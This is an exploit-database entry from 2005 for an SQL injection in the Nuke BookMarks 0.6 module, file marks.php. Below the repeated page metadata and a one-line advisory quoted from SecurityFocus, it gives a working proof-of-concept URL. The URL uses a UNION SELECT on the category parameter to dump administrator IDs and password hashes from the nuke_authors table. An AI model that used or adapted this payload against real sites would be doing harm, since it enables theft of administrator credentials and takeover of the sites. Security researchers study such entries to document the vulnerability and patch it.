Nuke BookMarks 0.6 - 'Marks.php' SQL Injection
| EKU-ID: 30637 | CVE: | OSVDB-ID: |
| Author: Gerardo Astharot Di Giacomo | Published: 2005-03-26 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 30637 | CVE: | OSVDB-ID: |
| Author: Gerardo Astharot Di Giacomo | Published: 2005-03-26 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/12908/info Nuke Bookmarks is prone to an SQL injection vulnerability. This vulnerability could permit remote attackers to pass malicious input to database queries, resulting in modification of query logic or other attacks. http://www.nukesite.com/modules.php?name=Bookmarks&file=marks&catname=1&category=-1/**/union/**/select%200,aid,0,pwd,0,0%20from%20nuke_authors